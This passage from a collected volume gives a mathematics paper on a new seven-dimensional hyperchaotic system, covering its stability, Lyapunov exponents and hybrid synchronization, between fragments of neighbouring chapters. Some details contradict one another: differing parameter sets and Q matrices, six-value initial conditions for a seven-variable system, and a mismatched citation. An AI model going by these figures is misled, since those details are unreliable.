Multimedia Tools and Applications, 78. https://doi.org/10.1007/s11042-018-7128-5
5. Abdelhakim, A., Saleh, H., & Nassar, A. (2016). Quality metric-based fitness function for robust
watermarking optimization with. Bees Algorithm IET Image Processing, 10(3), 247–252.
6. Abraham, J., & Paul, V. (2016). An imperceptible spatial domain color image watermarking
scheme. Journal of King Saud University—Computer and Information Sciences, 1–10, 31–133.
7. Garg, P., & Kishore, R. (2020). Performance comparison of various watermarking techniques.
Multimedia Tools and Applications, 79, 25921–25967.

8. Singh, A., Sharma, N., Dave, M., & Mohan, A. (2012). A novel technique for digital image
watermarking in spatial domain. In Proceedings of 2nd IEEE International Conference on
Parallel, Distributed and Grid Computing, PDGC (pp. 497–501).
9. Mathur, S., Dhingra, A., Prabukumar, M., Loganathan, A., & Muralibabu, K. (2016). An
efficient spatial domain based image watermarking using shell based pixel selection. In
International Conference on Advances in Computing, Communications and Informatics
(pp. 2696–2702). IEEE.
10. Bamatraf, A., Ibrahim, R., & Salleh, M. (2011). Digital watermarking algorithm using LSB.
In International Conference on Computer Applications and Industrial Electronics (ICCAIE)
(pp. 155–159). IEEE Xplore.
11. Patel, S., Mehta, T., & Pradhan, S. (2011). A unified technique for robust digital watermarking
of colour images using data mining and DCT. International Journal of Internet Technology
and Secured Transactions, 3, 81–96.
12. Pradhan, C., Saxena, V., & Bisoi, A. (2012). Non blind digital watermarking technique using
DCT and cross chaos map. In International conference on Communications, Devices and
Intelligent Systems (CODIS) (pp. 274–277). IEEE.
13. Li, N., Zheng, X., Zhao, Y., Wu, H., & Li, S. (2008). Robust algorithm of digital image
watermarking based on discrete wavelet transform. In International Symposium on Electronic
Commerce and Security (pp. 942–945). IEEE.
14. Maruturi, H., Bindu, H., & Swamy, K. (2016). A secure an invisible image watermarking
scheme based on wavelet transform in HSI color space. Procedia Computer Science, 93, 462–
468.
15. Hamidi, M., Haziti, M., Cherifi, H., & Mohammed, EL. H. (2018). Hybrid blind robust image
watermarking technique based on DFT-DCT and Arnold transform. Multimedia Tools and
Applications, 1–34.
16. Advith, J., Varun, K., & Manikantan, K. (2016). Novel digital image watermarking using
DWT-DFT-SVD in YCbCr color space (pp. 1–6). IEEE.
17. Hua, G., Huang, J., Shi, Y., Goh, J., & Thing, V. (2016). Twenty years of digital audio
watermarking—A comprehensive review. Signal Processing, 128, 222–242.
18. Singh, A., Dave, M., & Mohan, A. (2014). Hybrid technique for robust and imperceptible
multiple watermarking using medical images. Multimedia Tools Application, 1–21.
19. Perwej, Y., Parwej, F., & Perwej, A. (2012). An adaptive watermarking technique for the
copyright of digital images and digital image protection. International Journal of Multimedia
& Its Applications, 4(2), 21–38.
20. Aditya, K., Choudhary, A., Sing, M., & Adhikari, A. (2017). Image watermarking based on cuckoo search with DWT using lévy flight algorithms (pp. 29–33). https://doi.org/10.1109/NETACT.2017.8076737
21. Ansari, I., Pant, M., & Ahn, C. (2017). Secured and optimized robust image watermarking scheme. Arabian Journal for Science and Engineering, 43. https://doi.org/10.1007/s13369-017-2777-7
22. Ansari, I., Pant, M., Ahn, C. W. (2017). Artificial bee colony optimized robust-reversible image
watermarking. Multimedia Tools and Applications, 76.
23. Raj, S. J., Jero, E., Ramu, P., & Swaminathan, R. (2015). Imperceptibility—Robustness tradeoff
studies for ECG steganography using continuous Ant Colony optimization. Expert Systems with
Applications, 49. https://doi.org/10.1016/j.eswa.2015.12.010.
24. Ramasamy, R., & Arumugam, V. (2020). Robust image watermarking using fractional
Krawtchouk transform with optimization. Journal of Ambient Intelligence and Humanized
Computing, 1–12.
25. Abdelhakim, A., Saleh, H., & Nassar, A. (2016). A quality guaranteed robust image
watermarking optimization with Artificial Bee Colony. Expert Systems with Applications, 72.
26. Sejpal, S., & Shah, N. (2016). A novel multiple objective optimized color watermarking scheme
based on LWT-SVD domain using nature based bat algorithm and firefly. In 2016 IEEE Inter-
national Conference on Advances in Electronics, Communication and Computer Technology
(ICAECCT) (pp. 38–44).

27. Sisaudia, V., & Vishwakarma, V. (2020). Copyright protection using KELM-PSO based multi-
spectral image watermarking in DCT domain with local texture information based selection.
Multimedia Tools and Applications, 1–22.
28. Maloo, S., Kumar, M., & Lakshmi, N. (2020). A modified whale optimization algorithm based
digital image watermarking approach. Sensing and Imaging, 1–22.
29. Kazemivash, B., & Ebrahimi Moghaddam, M. (2017). A robust digital image watermarking technique using lifting wavelet transform and firefly algorithm. Multimedia Tools and Applications, 76.
30. Moeinaddini, E. (2019). Selecting optimal blocks for image watermarking using entropy and
distinct discrete firefly algorithm. Soft Computing., 23, 1–15.
31. Karaboga, D. (2005). An idea based on Honey Bee swarm for numerical optimization
(pp. 1–10). Erciyes University, Engineering Faculty, Computer Engineering Department,
Kayseri/Türkiye, Technical report-Tr06.
32. Karaboga, D., & Basturk, B. (2007). Artificial Bee Colony (ABC) optimization algorithm for
solving constrained optimization problems. Foundations of fuzzy logic and soft computing.
In 12th International Fuzzy Systems Association World Congress, IFSA 2007 (pp. 789–798),
Cancun, Mexico 4529.
33. Karaboga, D., & Akay, B. (2009). A comparative study of artificial bee colony algorithm.
Applied Mathematics and Computation, 214(1), 108–132.
34. Kennedy, J., & Eberhart, R. (1995). Particle swarm optimization. In Proceedings of IEEE
International Conference on Neural Networks (pp. 1942–1948). Institute of Electrical and
Electronics Engineers, New York.
35. Zhou, N., Luo, A., Zou, W. P. (2018). Secure and robust watermark scheme based on multiple
transforms and particle swarm optimization algorithm. Multimedia Tools Application, 1–17.
36. Dubolia, R., Singh, R., Bhadoria, S., & Gupta, R. (2011). Digital image watermarking by using
discrete wavelet transform and discrete cosine transform and comparison based on PSNR.
In IEEE International Conference on Communication Systems and Network Technologies
(pp. 593–596).
37. Xu, H., Kang, X., Wang, Y., Wang, Y. (2018). Exploring robust and blind watermarking
approach of colour images in DWT-DCT-SVD domain for copyright protection. Inderscience
International Journal of Electronic Security and Digital Forensics, 10(1), 79–96.
38. Nguyen, P. –B., Luong, M., & Beghdadi, A. (2010). Statistical analysis of image quality metrics
for watermark transparency assessment. 6297, 685–696.
39. Lin, Y., & Abdulla, W. (2011). Objective quality measures for perceptual evaluation in digital
audio watermarking. IET Signal Processing, 5(7), 623–631.
40. Marini, E., Autrusseau, F., Le Callet, P., Campisi, P. (2007). Evaluation of standard water-
marking techniques. In Electronic Imaging, Security, Steganography, and Watermarking of
Multimedia Contents, San Jose, United States: 6505-24.
A Novel Seven-Dimensional Hyperchaotic

M. Lellis Thivagar, Abdulsattar Abdullah Hamad, B. Tamilarasan,


and G. Kabin Antony

Abstract In this work, based on state feedback control, a novel 7D hyperchaotic system with five positive Lyapunov exponents is constructed. Various significant aspects of the new mechanism, including equilibrium points, stability, and Lyapunov exponents, are evaluated. Computer modeling shows that complex dynamical behaviors such as chaotic, hyperchaotic, and periodic motion are demonstrated by the new system. The dynamic properties of this theoretical and numerical simulation system are analyzed on the basis of equilibrium points, stability, dissipation, Lyapunov exponents, and the phase portrait. In addition, different attractors with different initial conditions are investigated under the same parameters. Moreover, hybrid synchronization between two similar, identical systems is achieved through a nonlinear control strategy and Lyapunov stability theory in MATLAB. A good agreement was obtained between the numerical and theoretical analyses of the system dynamics on the basis of the equilibrium points; the new hyperchaotic system may find good applications in the fields of encryption and nonlinear circuits.

Keywords Chaotic system · Synchronization · Lyapunov · Stability · Equilibrium

1 Introduction

The mathematical meteorologist Edward N. Lorenz discovered the first famous three-dimensional (3D) chaotic system in 1963, a computational model with real variables that has only one positive Lyapunov exponent and two quadratic nonlinearities. Subsequently, in 1976, Rössler introduced another 3D chaotic system, which consists of six terms but only one polynomial nonlinearity. Among the well-known 3D chaotic systems is the Chen system [1–4]. The first four-dimensional (4D) hyperchaotic system was presented by Rössler in 1979, a scheme with two positive Lyapunov exponents and real variables, and several 4D chaotic schemes
M. L. Thivagar · A. A. Hamad (B) · B. Tamilarasan · G. K. Antony


School of Mathematics, Madurai Kamaraj University, Madurai, Tamilnadu, India


were found in the literature [5, 6]. Both of those methods are characterized by two positive Lyapunov exponents, and the dimension of a hyperchaotic system is linked to the number of positive Lyapunov exponents; thus, the minimum dimension for hyperchaotic structures is four [1, 7]. A hyperchaotic system is a system with more than one positive Lyapunov exponent, while a chaotic system has only one positive Lyapunov exponent [7, 10]. In order to increase the number of positive Lyapunov exponents, the dimension of the system must be increased. Lately, there has been great interest in building 5D hyperchaotic structures with three positive Lyapunov exponents, such as the Hu system of 2009 [7] and Yang [8]. A hyperchaotic system with a higher dimension is effective and important compared with a low-dimensional one because of its higher unpredictability and randomness, and it has better performance than the traditional 3D, 4D, and 5D systems. Until now, a number of works related to this subject have appeared, and numerous papers on the construction of new high-dimensional (6D) systems with four positive Lyapunov exponents have been published [9–14]. In 2018, Yang et al. built a 6D hyperchaotic system with four positive Lyapunov exponents, LE1 = 0.4302, LE2 = 0.2185, LE3 = 0.1294, LE4 = 0.0775, LE5 = −0.0001, LE6 = −12.5222, consisting of 16 terms, three of which are nonlinear, described by Eq. (1) [13]:


$$
\begin{cases}
\dot{x}_1(t) = a(x_2 - x_1) + x_4 + r x_6\\
\dot{x}_2(t) = c x_1 - x_2 - x_1 x_3 + x_5\\
\dot{x}_3(t) = -b x_3 + x_1 x_2\\
\dot{x}_4(t) = d x_4 - x_1 x_3\\
\dot{x}_5(t) = -h x_2 + x_6\\
\dot{x}_6(t) = k_1 x_1 + k_2 x_2
\end{cases}
\tag{1}
$$

where $(x_1(t), \ldots, x_6(t))^T \in R^6$ are the real state variables of system (1), $abdh \neq 0$, $a, b, c$ are constraint parameters, and $d, h, r, k_1, k_2$ are the control parameters.

2 The 7D Hyperchaotic System

Based on state feedback control, a new class of high-dimensional (7D) hyperchaotic system is proposed: by adding a nonlinear controller state x7 to the first equation of system (1), together with a seventh state equation, a 7D hyperchaotic system is constructed, which is described as:

Fig. 1 Attractors of new system: a x1 − x3 − x4 space and b x3 − x6 plane



$$
\begin{cases}
\dot{x}_1(t) = a(x_2 - x_1) + x_4 + r x_6 - x_7\\
\dot{x}_2(t) = c x_1 - x_2 - x_1 x_3 + x_5\\
\dot{x}_3(t) = -b x_3 + x_1 x_2\\
\dot{x}_4(t) = d x_4 - x_1 x_3\\
\dot{x}_5(t) = -h x_2 + x_6\\
\dot{x}_6(t) = p x_1 + q x_2\\
\dot{x}_7(t) = x_1 x_2 - k x_7
\end{cases}
\tag{2}
$$

where $(x_1(t), \ldots, x_7(t))^T \in R^7$ are the real state variables of system (2), $a, b, c, d, h, r, p, q$ are the constant real parameters, and $k$ is the control parameter that defines the dynamic behavior. When a = 10, b = 8/3, c = 28, d = 2, h = 9.9, r = 1, p = 1, q = 2, and k = 12, the above system has a hyperchaotic attractor, as shown in Fig. 1. Thus, the new class of system consists of 19 terms, four of which are nonlinear.
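A minimal numerical sketch of integrating system (2) with the quoted parameter set is given below; the initial condition is chosen arbitrarily, and the claim that the resulting trajectory reproduces the attractor of Fig. 1 is taken from the paper rather than verified here.

```python
import numpy as np
from scipy.integrate import solve_ivp

# parameter set quoted for the hyperchaotic attractor in the text
a, b, c, d, h, r, p, q, k = 10, 8/3, 28, 2, 9.9, 1, 1, 2, 12

def system7d(t, x):
    x1, x2, x3, x4, x5, x6, x7 = x
    return [a*(x2 - x1) + x4 + r*x6 - x7,
            c*x1 - x2 - x1*x3 + x5,
            -b*x3 + x1*x2,
            d*x4 - x1*x3,
            -h*x2 + x6,
            p*x1 + q*x2,
            x1*x2 - k*x7]

# arbitrary initial condition, not taken from the paper
sol = solve_ivp(system7d, (0, 50), [1, 1, 1, 1, 1, 1, 1], max_step=0.01)
# sol.y rows are x1..x7; plotting (x1, x3, x4) should resemble Fig. 1a per the paper
```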

2.1 Equilibrium and Stability

If the right-hand side of system (2) is set equal to zero, then the equilibrium points solve the following equations:

$$
\begin{cases}
a(x_2 - x_1) + x_4 + r x_6 - x_7 = 0\\
c x_1 - x_2 - x_1 x_3 + x_5 = 0\\
-b x_3 + x_1 x_2 = 0\\
d x_4 - x_1 x_3 = 0\\
-h x_2 + x_6 = 0\\
p x_1 + q x_2 = 0\\
x_1 x_2 - k x_7 = 0
\end{cases}
\tag{3}
$$

Then it has only one equilibrium point O(0, 0, 0, 0, 0, 0, 0). The Jacobian matrix
of system (2) at origin point is
$$
J(O)=\begin{bmatrix}
-a & a & 0 & 1 & 0 & r & -1\\
c & -1 & 0 & 0 & 1 & 0 & 0\\
0 & 0 & -b & 0 & 0 & 0 & 0\\
0 & 0 & 0 & d & 0 & 0 & 0\\
0 & -h & 0 & 0 & 0 & 1 & 0\\
p & q & 0 & 0 & 0 & 0 & 0\\
0 & 0 & 0 & 0 & 0 & 0 & -k
\end{bmatrix}
$$

Based on $|J(O) - \lambda I| = 0$, with $I$ the $7 \times 7$ identity matrix, the characteristic equation and eigenvalues at $(a, b, c, d, h, r, p, q, k) = (10, 8/3, 28, 2, 9.9, 1, 1, 2, 12)$ are, respectively:

$$
\lambda^7 + \frac{71}{3}\lambda^6 - \frac{1191}{10}\lambda^5 - \frac{49529}{15}\lambda^4 - \frac{1867}{2}\lambda^3 + \frac{48935}{3}\lambda^2 - \frac{13332}{5}\lambda + \frac{12768}{5} = 0
$$

$$
\lambda_1 = 2,\quad \lambda_2 = -12,\quad \lambda_3 = -\tfrac{8}{3},\quad \lambda_4 = 11.4755,\quad \lambda_5 = -22.6229,\quad \lambda_{6,7} = 0.0737 \pm 0.3850i
$$

It is clear that some roots have positive real parts; therefore, the point O is unstable. Hence, system (2) is classified as a system with self-excited attractors (if a system possesses unstable equilibrium points, it is called a system with self-excited attractors).
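The instability of O can be cross-checked numerically by building J(O) with the quoted parameter values and computing its eigenvalues; the short sketch below should reproduce eigenvalues close to those listed above.

```python
import numpy as np

a, b, c, d, h, r, p, q, k = 10, 8/3, 28, 2, 9.9, 1, 1, 2, 12

# Jacobian of system (2) evaluated at the origin
J0 = np.array([
    [-a,  a,  0, 1, 0, r, -1],
    [ c, -1,  0, 0, 1, 0,  0],
    [ 0,  0, -b, 0, 0, 0,  0],
    [ 0,  0,  0, d, 0, 0,  0],
    [ 0, -h,  0, 0, 0, 1,  0],
    [ p,  q,  0, 0, 0, 0,  0],
    [ 0,  0,  0, 0, 0, 0, -k]])

eig = np.linalg.eigvals(J0)
print(np.sort_complex(eig))
print("unstable:", np.any(eig.real > 0))   # expected True, matching the analysis above
```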

Fig. 2 Lyapunov exponents, of the new 7D system

2.2 Lyapunov Exponents and Lyapunov Dimension

The numerical simulation was carried out with the Wolf algorithm and MATLAB software. For a = 9, b = 7/3, c = 27, d = 2, h = 9, r = 1, p = 1, q = 2, k = 12, system (2) is hyperchaotic and has five positive Lyapunov exponents:

LE1 = 0.42401, LE2 = 0.21088, LE3 = 0.11102, LE4 = 0.025979,


LE5 = 0.0023358, LE6 = −11.6305, LE7 = −12.7881

The exponents of the Lyapunov plot are shown in Fig. 2.


To explore the influence of the parameters on the dynamics of the 7D system (2), fix a = 9, b = 7/3, c = 27, d = 2, p = 1, q = 2, h = 9, r = 1 and vary k. System (2) then evolves into chaotic or hyperchaotic behavior; the results, obtained with the Wolf algorithm, are given in Table 1.
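Although the section title mentions the Lyapunov dimension, no value is quoted in this excerpt; as a hedged illustration only, the Kaplan–Yorke estimate can be computed from the exponents listed above (this is our calculation, not a value reported by the authors).

```python
import numpy as np

# Lyapunov exponents quoted in the text for a = 9, b = 7/3, c = 27, d = 2, h = 9, r = 1, p = 1, q = 2, k = 12
les = np.array([0.42401, 0.21088, 0.11102, 0.025979, 0.0023358, -11.6305, -12.7881])

def kaplan_yorke(exponents):
    """Kaplan-Yorke (Lyapunov) dimension: j + (sum of first j exponents) / |lambda_{j+1}|."""
    le = np.sort(exponents)[::-1]
    cum = np.cumsum(le)
    j = int(np.max(np.where(cum >= 0)[0]))   # largest index with a non-negative partial sum
    return (j + 1) + cum[j] / abs(le[j + 1])

print(kaplan_yorke(les))   # roughly 5 + 0.774/11.63, i.e. about 5.07
```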

3 Hybrid Synchronization of the New 7D Hyperchaotic Systems

Assume that system (2) is the drive system; it can be written as
Table 1 Exponents of Lyapunov for certain values of k

| k | LE1 | LE2 | LE3 | LE4 | LE5 | LE6 | LE7 | Dynamics |
|---|---|---|---|---|---|---|---|---|
| 0.01 | 0.167 | −0.008 | −0.219 | −1.017 | −2.967 | −8.380 | −8.380 | Period orbits |
| 0.19 | 0.029 | −0.071 | −0.084 | −0.025 | −0.430 | −11.336 | −11.336 | Period orbits |
| 0.5 | 0.225 | 0.0149 | −0.014 | −0.053 | −0.529 | −11.310 | −11.310 | Chaos |
| 0.75 | 0.263 | 0.066 | 0.000 | −0.054 | −0.512 | −11.587 | −11.587 | Quasi-periodic |
| 2.3 | 0.318 | 0.199 | 0.008 | −0.109 | −0.770 | −12.459 | −12.459 | Hyperchaos |
| 2.55 | 0.336 | 0.143 | −0.024 | −0.074 | −0.802 | −12.204 | −12.204 | Chaos |
| 2.8 | 0.299 | 0.176 | 0.007 | −0.136 | −0.962 | −12.192 | −12.192 | Hyperchaos |
| 3.1 | 0.338 | 0.126 | 0.011 | −0.047 | −0.957 | −12.054 | −12.054 | Hyperchaos |
| 7.5 | 0.444 | 0.221 | 0.000 | 1.694 | −1.100 | −12.577 | −12.577 | Hyperchaos |
| 12 | 0.41305 | 0.21088 | 0.10127 | 0.025979 | 0.0023358 | −11.6305 | −12.7881 | Hyperchaos |

$$
\begin{bmatrix} \dot{x}_1\\ \dot{x}_2\\ \dot{x}_3\\ \dot{x}_4\\ \dot{x}_5\\ \dot{x}_6\\ \dot{x}_7 \end{bmatrix}
=
\underbrace{\begin{bmatrix}
-a & a & 0 & 1 & 0 & r & -1\\
c & -1 & 0 & 0 & 1 & 0 & 0\\
0 & 0 & -b & 0 & 0 & 0 & 0\\
0 & 0 & 0 & d & 0 & 0 & 0\\
0 & -h & 0 & 0 & 0 & 1 & 0\\
p & q & 0 & 0 & 0 & 0 & 0\\
0 & 0 & 0 & 0 & 0 & 0 & -k
\end{bmatrix}}_{A_1}
\begin{bmatrix} x_1\\ x_2\\ x_3\\ x_4\\ x_5\\ x_6\\ x_7 \end{bmatrix}
+
\underbrace{\begin{bmatrix}
0 & 0 & 0 & 0\\
1 & 0 & 0 & 0\\
0 & 1 & 0 & 0\\
0 & 0 & 1 & 0\\
0 & 0 & 0 & 0\\
0 & 0 & 0 & 0\\
0 & 0 & 0 & 1
\end{bmatrix}}_{B_1}
\underbrace{\begin{bmatrix} -x_1 x_3\\ x_1 x_2\\ -x_1 x_3\\ x_1 x_2 \end{bmatrix}}_{C_1}
\tag{4}
$$

The matrix A1 is the system matrix of (2), and the product B1C1 describes the nonlinear part of system (2). The response system is given by:
$$
\begin{bmatrix} \dot{y}_1\\ \dot{y}_2\\ \vdots\\ \dot{y}_7 \end{bmatrix}
= A_2 \begin{bmatrix} y_1\\ y_2\\ \vdots\\ y_7 \end{bmatrix}
+ \left( B_2 C_2 + \begin{bmatrix} u_1\\ u_2\\ \vdots\\ u_7 \end{bmatrix} \right),
\qquad
C_2 = \begin{bmatrix} -y_1 y_3\\ y_1 y_2\\ -y_1 y_3\\ y_1 y_2 \end{bmatrix}
\tag{5}
$$

Let $U = [u_1, u_2, u_3, u_4, u_5, u_6, u_7]^T$ be the nonlinear controller to be designed.
• If $A_1 = A_2$ and $B_1 = B_2$, the systems are called identical.
• If $A_1 \neq A_2$ and/or $B_1 \neq B_2$, the systems are called non-identical (different).

The hybrid synchronization error between the 7D hyperchaotic system (4) and system (5) is defined as $e_i = y_i - \alpha x_i$, where

$$
\alpha = \begin{cases} 1, & i = 1, 3, 5, 7 \ (\text{odd})\\ -1, & i = 2, 4, 6 \ (\text{even}) \end{cases}
$$

and it is required that $\lim_{t\to\infty} e_i = 0$. The error dynamics are calculated as follows:


$$
\begin{cases}
\dot{e}_1 = a e_2 - 2 a x_2 - a e_1 + e_4 - 2 x_4 + r e_6 - 2 r x_6 - e_7 + u_1\\
\dot{e}_2 = c e_1 + 2 c x_1 - e_2 + e_5 + 2 x_5 - y_1 e_3 + x_3 e_1 - 2 y_1 x_3 + u_2\\
\dot{e}_3 = -b e_3 + e_1 e_2 - x_2 e_1 + x_1 e_2 - 2 x_1 x_2 + u_3\\
\dot{e}_4 = d e_4 - y_1 e_3 + x_3 e_1 - 2 y_1 x_3 + u_4\\
\dot{e}_5 = -h e_2 + 2 h x_2 + e_6 - 2 x_6 + u_5\\
\dot{e}_6 = p e_1 + 2 p x_1 + q e_2 + u_6\\
\dot{e}_7 = -k e_7 + e_1 e_2 - x_2 e_1 + x_1 e_2 - 2 x_1 x_2 + u_7
\end{cases}
\tag{6}
$$

Theorem
If the control U of system (6) is designed as the following:


$$
\begin{cases}
u_1 = 2 a x_2 + 2 x_4 - r e_6 + 2 r x_6 - c e_2 - x_3 e_2 - p e_6\\
u_2 = -a e_1 - 2 c x_1 - 2 x_5 + 2 y_1 x_3 - x_1 e_3 - q e_6 - x_1 e_7\\
u_3 = y_1 e_2 - e_1 e_2 + x_2 e_1 + 2 x_1 x_2 + y_1 e_4\\
u_4 = -2 d e_4 - e_1 - x_3 e_1 + 2 y_1 x_3\\
u_5 = -2 h x_2 + 2 x_6 - e_5\\
u_6 = -2 p x_1 - e_5 - e_6\\
u_7 = e_1 - e_1 e_2 + x_2 e_1 + 2 x_1 x_2
\end{cases}
\tag{7}
$$

Then the system (5) can follow the system (4).

Proof Substituting the above control into the error dynamics (6), we get:
$$
\begin{cases}
\dot{e}_1 = a e_2 - a e_1 + e_4 - e_7 - c e_2 - x_3 e_2 - p e_6\\
\dot{e}_2 = c e_1 - e_2 + e_5 - y_1 e_3 + x_3 e_1 - a e_1 - x_1 e_3 - q e_6 - x_1 e_7\\
\dot{e}_3 = -b e_3 + x_1 e_2 + y_1 e_2 + y_1 e_4\\
\dot{e}_4 = -d e_4 - y_1 e_3 - e_1\\
\dot{e}_5 = -h e_2 + e_6 - e_5\\
\dot{e}_6 = p e_1 + q e_2 - e_5 - e_6\\
\dot{e}_7 = -k e_7 + x_1 e_2 + e_1
\end{cases}
\tag{8}
$$

In the linearization method, the characteristic equation and eigenvalues are

$$
\lambda^7 + \frac{89}{3}\lambda^6 + \frac{6529}{10}\lambda^5 + \frac{238931}{30}\lambda^4 - \frac{1182143}{30}\lambda^3 + \frac{291515}{3}\lambda^2 + \frac{1944721}{15}\lambda + \frac{1163288}{15} = 0
$$

$$
\lambda_1 = -\tfrac{8}{3},\quad \lambda_2 = -11.9657,\quad \lambda_3 = -2.0021,\quad \lambda_{4,5} = -1.1984 \pm 1.4399i,\quad \lambda_{6,7} = -5.3177 \pm 17.8223i
$$

Clearly, all eigenvalues have negative real parts, so the linearization approach establishes the hybrid synchronization (HS) between system (4) and system (5). Alternatively, if the Lyapunov function is constructed as

$$
V(e) = [e_1, e_2, e_3, e_4, e_5, e_6, e_7]\,
\operatorname{diag}\!\left(\tfrac12, \tfrac12, \tfrac12, \tfrac12, \tfrac{5}{99}, \tfrac12, \tfrac12\right)
[e_1, e_2, e_3, e_4, e_5, e_6, e_7]^{T}
$$

The derivative of the above function V (ei ) is

$$
\dot{V}(e) = e_1\dot{e}_1 + e_2\dot{e}_2 + e_3\dot{e}_3 + e_4\dot{e}_4 + \tfrac{10}{99} e_5\dot{e}_5 + e_6\dot{e}_6 + e_7\dot{e}_7
$$

$$
\begin{aligned}
\dot{V}(e) ={}& e_1\,(a e_2 - a e_1 + e_4 - e_7 - c e_2 - x_3 e_2 - p e_6)\\
&+ e_2\,(c e_1 - e_2 + e_5 - y_1 e_3 + x_3 e_1 - a e_1 - x_1 e_3 - q e_6 - x_1 e_7)\\
&+ e_3\,(-b e_3 + x_1 e_2 + y_1 e_2 + y_1 e_4) + e_4\,(-d e_4 - y_1 e_3 - e_1)\\
&+ \tfrac{10}{99}\, e_5\,(-h e_2 + e_6 - e_5) + e_6\,(p e_1 + q e_2 - e_5 - e_6)\\
&+ e_7\,(-k e_7 + x_1 e_2 + e_1)
\end{aligned}
$$

$$
\dot{V}(e) = -[e_1, e_2, e_3, e_4, e_5, e_6, e_7]\,
\operatorname{diag}\!\left(10, 1, \tfrac{8}{3}, 2, \tfrac{10}{99}, 1, 12\right)
[e_1, e_2, e_3, e_4, e_5, e_6, e_7]^{T}
$$

where Q = diag(9, 1, 7/3, 2, 10/99, 1, 12), so Q > 0. Consequently, V̇(e) is negative definite on R^7. The nonlinear controller is sufficient and it achieves the HS.

Fig. 3 New attractor of proposed 7D, (x1, x2, x7)
Now, we take the initial values (15, 2, 0, −2, −3, 0) and (−15, −10, −8, 6, 0, −4) to illustrate numerically the HS between (4) and (5). Figures 3 and 4 verify these results numerically (see also Figs. 5 and 6).
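As a quick numerical cross-check of the linearization argument, one can compute the roots of the closed-loop characteristic polynomial given in the proof; if the polynomial has been transcribed correctly, the roots should agree with the eigenvalues listed there and all real parts should be negative.

```python
import numpy as np

# coefficients of the closed-loop characteristic polynomial quoted in the proof
coeffs = [1, 89/3, 6529/10, 238931/30, -1182143/30, 291515/3, 1944721/15, 1163288/15]
roots = np.roots(coeffs)
print(np.sort_complex(roots))
print("all real parts negative:", np.all(roots.real < 0))
```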

4 Discussion

The proposed work is characterized by its new parameters, most of which are positive; based on state feedback control, it considers five positive Lyapunov exponents and constructs a novel 7D hyperchaotic system. Various significant aspects of the new mechanism, including equilibrium points, stability, and Lyapunov exponents, are evaluated. The computer modeling shows that complex dynamical behaviors such as chaotic, hyperchaotic, and periodic motion are demonstrated by the new system. The hybrid synchronization (HS) between two very similar systems, obtained via Lyapunov stability theory for the current scheme, is also reported in this section.

Fig. 4 New attractor of proposed 7D, (x1, x3, x6)

Fig. 5 New attractor of proposed 7D, (x3, x4, x6)

Fig. 6 Convergence of system
Figures 1, 2, and 3 illustrate the Lyapunov exponents of the new 7D system and the new attractor of the proposed 7D system with a = 9, b = 7/3, c = 27, d = 2, p = 1, q = 2, h = 9, r = 1, and k varied. Table 1 shows how system (2) evolves into chaotic or hyperchaotic behavior; these results are derived from the Wolf algorithm. With Q = diag(9, 1, 7/3, 2, 10/99, 1, 12), Q > 0; consequently, V̇(e) is negative definite on R^7, and the nonlinear controller is sufficient and achieves the HS.

5 Conclusions

In this paper, by introducing a nonlinear controller into the first equation of the 6D Lorenz-type system (1), a novel seven-dimensional continuous real-variable hyperchaotic system with five positive Lyapunov exponents was suggested. In addition, with two analytical methods, Lyapunov's method and the linearization method, some characteristics of the dynamic behavior such as equilibrium points, stability, and Lyapunov exponents were investigated on the basis of a nonlinear control strategy. The new hyperchaotic system may find good applications in the field of encryption and nonlinear circuits.

Acknowledgements The authors acknowledges Rashtriya Uchchatar Shiksha Abhiyan (RUSA)


for providing financial support under RUSA-MKU—Research Project Scheme.

References

1. Wang, W., & Guan, Z. H. (2006). Generalized synchronization of continuous chaotic system.
Chaos, Solitons & Fractals, 27(1), 97–101.
2. Al-Azzawi, S. F. (2012). Stability and bifurcation of Pan chaotic system by using Routh-Hurwitz
and Gardan method. Applied Mathematics and Computation, 219(3), 1144–1152.
3. Khalaf, O. I., Ajesh, F., Hamad, A. A., Nguyen, G. N., & Le, D. N. (2020). Efficient dual-
cooperative bait detection scheme for collaborative attackers on mobile ad-hoc networks. IEEE
Access, 8, 227962–227969.
4. AL-Azzawi, S. F., et al. (2020). Chaotic Lorenz system and it’s suppressed. Journal of Advanced
Research in Dynamical and Control Systems, 12(2), 548–555.
5. Zhang, G., et al. (2017). On the dynamics of new 4D Lorenz-type chaos systems. Advances in
Difference Equations, 2017(1).
6. Abed, K. A. (2020). Controlling of jerk chaotic system via linear feedback control strategies.
Indonesian Journal of Electrical Engineering and Computer Science, 20(1), 370–378.
7. Zhu, C. (2010). Control and synchronize a novel hyperchaotic system. Applied Mathematics
and Computation, 216(1), 276–284.
8. Thivagar, M. L., & Abdullah Hamad, A. (2020). A theoretical implementation for a proposed
hyper-complex chaotic system. Journal of Intelligent & Fuzzy Systems, 38(3), 2585–2595.
9. Thivagar, L. M., Hamad, A. A., & Ahmed, S. G. (2020). Conforming dynamics in the metric
spaces. Journal of Information Science and Engineering, 36(2), 279–291.
10. Thivagar, M. L., Ahmed, M. A., Ramesh, V., & Hamad, A. A. (2020). Impact of non-linear
electronic circuits and switch of chaotic dynamics. Periodicals of Engineering and Natural
Sciences, 7(4), 2070–2091.
11. Al-Azzawi, S. F., Thivagar, M. L., Al-Obeidi, A. S., & Hamad, A. A. (2020). Hybrid synchro-
nization for a novel class of 6D system with unstable equilibrium points. Materials Today:
Proceedings. https://doi.org/10.1016/j.matpr.2020.10.524.
12. Thivagar, M. L., & Hamad, A. A. (2019). Topological geometry analysis for complex dynamic
systems based on adaptive control method. Periodicals of Engineering and Natural Sciences,
7(3), 1345–1353.
13. Hamad, A. A., Al-Obeidi, A. S., & Al-Taiy, E. H. (2020). Synchronization phenomena inves-
tigation of a new nonlinear dynamical system 4D by Gardano’s and Lyapunov’s methods.
Computers, Materials & Continua, 66(3), 3311–3327.
14. Abed, F. N., Hamad, A. A., & Sapit, A. B. (2020). The effect analysis for the nano powder
dielectric processing of ti-6242 alloy is performed on wire cut-electric, discharge. Materials
Today Proceedings. https://doi.org/10.1016/j.matpr.2020.09.368.
A Literature Review on H∞ Neural
Network Adaptive Control

Parul Kashyap

